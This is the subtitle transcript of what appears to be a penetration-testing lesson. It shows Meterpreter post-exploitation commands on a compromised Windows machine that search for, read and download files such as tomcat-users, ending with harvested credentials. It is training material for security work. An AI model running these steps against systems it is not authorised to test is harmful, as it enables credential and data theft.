1
00:00:00,580 --> 00:00:09,160
Information leakage is one of the largest threats that corporations face, and much of it can be prevented

2
00:00:09,160 --> 00:00:13,030
by educating users to properly secure their data.

3
00:00:15,010 --> 00:00:23,950
Users being users and more likely human, however, will frequently save data to their local workstations

4
00:00:23,950 --> 00:00:28,630
instead of on the corporate servers, where there's a whole lot more control and security.

5
00:00:30,250 --> 00:00:38,530
Meterpreter happens to have a search function that will, by default, scour all drives of the compromised

6
00:00:38,530 --> 00:00:42,130
computer looking for files of your choosing.

7
00:00:43,670 --> 00:00:45,080
So besides the search command,

8
00:00:46,050 --> 00:00:55,110
there are also two other options: a Meterpreter script called file_collector and a post module called

9
00:00:55,500 --> 00:00:56,580
enum_files.

10
00:00:57,580 --> 00:01:01,990
All these options can help you download files from the target.

11
00:01:03,180 --> 00:01:06,170
And you can choose any of them according to your needs.

12
00:01:08,070 --> 00:01:13,920
So after you have a Meterpreter shell on the machine, you can search for any file on the target.

13
00:01:15,300 --> 00:01:19,080
Now, surely you shouldn't just blindly search for anything.

14
00:01:20,230 --> 00:01:27,390
You can look for configuration files that contain passwords and keys, et cetera, et cetera.

15
00:01:28,740 --> 00:01:35,670
Also, if you compromised an administrative machine, you can look for some additional network topology

16
00:01:35,670 --> 00:01:39,140
information, network configuration, et cetera, et cetera.

17
00:01:40,140 --> 00:01:42,870
But anyway, the search command is very simple.

18
00:01:44,020 --> 00:01:45,520
Type search -f

19
00:01:46,770 --> 00:01:51,000
and then the filename that you want to find, win.ini.

20
00:01:53,010 --> 00:01:54,810
OK, so the result has two files.

21
00:01:56,080 --> 00:02:00,190
If this is a standard text file, you can just view its content.

22
00:02:01,390 --> 00:02:03,100
cat C:\

23
00:02:04,210 --> 00:02:04,960
Windows\

24
00:02:05,810 --> 00:02:07,430
win.ini.

25
00:02:10,500 --> 00:02:13,350
And another query with the search command,

26
00:02:14,620 --> 00:02:17,380
to look for a tomcat-users file.

27
00:02:18,690 --> 00:02:20,010
search -f

28
00:02:21,460 --> 00:02:23,200
tomcat-users.

29
00:02:26,520 --> 00:02:27,810
And here are the results.

30
00:02:29,480 --> 00:02:33,950
Now, you can also perform your search on a specific directory.

31
00:02:35,020 --> 00:02:42,520
All you need to do is just add the -d parameter and the folder name: -d C:\

32
00:02:43,920 --> 00:02:45,180
ManageEngine.

33
00:02:47,760 --> 00:02:52,680
And then after you find what you're looking for, you already know that you can download this file using

34
00:02:52,680 --> 00:02:54,450
the download command.

35
00:03:05,420 --> 00:03:09,140
And that's it, I just downloaded the tomcat-users file.

36
00:03:11,460 --> 00:03:15,150
OK, so here is the file in my local storage.

37
00:03:16,290 --> 00:03:18,170
So I can attend to that later.

38
00:03:19,570 --> 00:03:24,850
But I want to show you another option, and that's to use the file_collector script.

39
00:03:27,700 --> 00:03:29,650
And this is the help menu for the script.

40
00:03:30,900 --> 00:03:37,650
And the best feature of this script is that you can provide a list, and then it can search and then download

41
00:03:37,650 --> 00:03:38,190
that list.

42
00:03:39,430 --> 00:03:41,620
And the parameters are very clear.

43
00:03:42,780 --> 00:03:45,360
So I'm going to use the script with these parameters.

44
00:03:46,730 --> 00:03:48,470
And hit enter.

45
00:03:51,350 --> 00:03:51,800
Now,

46
00:03:52,780 --> 00:03:59,980
I think the script is probably obsolete, so it doesn't work in my case, but the usage is like that,

47
00:03:59,980 --> 00:04:00,460
and

48
00:04:01,600 --> 00:04:03,940
you probably can run it in your environment.

49
00:04:05,360 --> 00:04:10,400
Now, you also have a post module that will do what this script does.

50
00:04:11,440 --> 00:04:12,820
So let's look at it here.

51
00:04:13,500 --> 00:04:16,870
The information for the enum_files post module.

52
00:04:20,240 --> 00:04:27,110
And it also has the same search command. For me, I prefer to use the search command.

53
00:04:28,520 --> 00:04:30,490
But it's always better to know alternatives.

54
00:04:31,700 --> 00:04:34,010
OK, run post/

55
00:04:35,050 --> 00:04:36,940
windows/gather/

56
00:04:38,160 --> 00:04:39,690
enum_files.

57
00:04:41,330 --> 00:04:41,900
Then

58
00:04:43,150 --> 00:04:47,800
FILE_GLOBS=tomcat

59
00:04:48,810 --> 00:04:52,560
.xml to look for files like that.

60
00:04:53,660 --> 00:05:05,990
And SEARCH_FROM=C:\\, C colon backslash backslash, to start the search from the C root directory, Windows.

61
00:05:07,990 --> 00:05:09,160
And then the search runs.

62
00:05:10,090 --> 00:05:13,180
And the post module also downloads the found files.

63
00:05:14,290 --> 00:05:16,090
So why don't we check the files?

64
00:05:18,480 --> 00:05:20,610
We'll copy the first file path.

65
00:05:22,130 --> 00:05:29,300
And go to the next one. I typically use Sublime to open files, but you can use another text editor to

66
00:05:29,300 --> 00:05:30,530
open files, it doesn't matter.

67
00:05:31,810 --> 00:05:32,860
Oh, look at that.

68
00:05:32,890 --> 00:05:33,910
Nothing in this file.

69
00:05:36,230 --> 00:05:37,600
OK, so I'll copy another one.

70
00:05:41,790 --> 00:05:42,960
Open it with Sublime.

71
00:05:44,850 --> 00:05:48,270
There we are, finally, you get some credentials.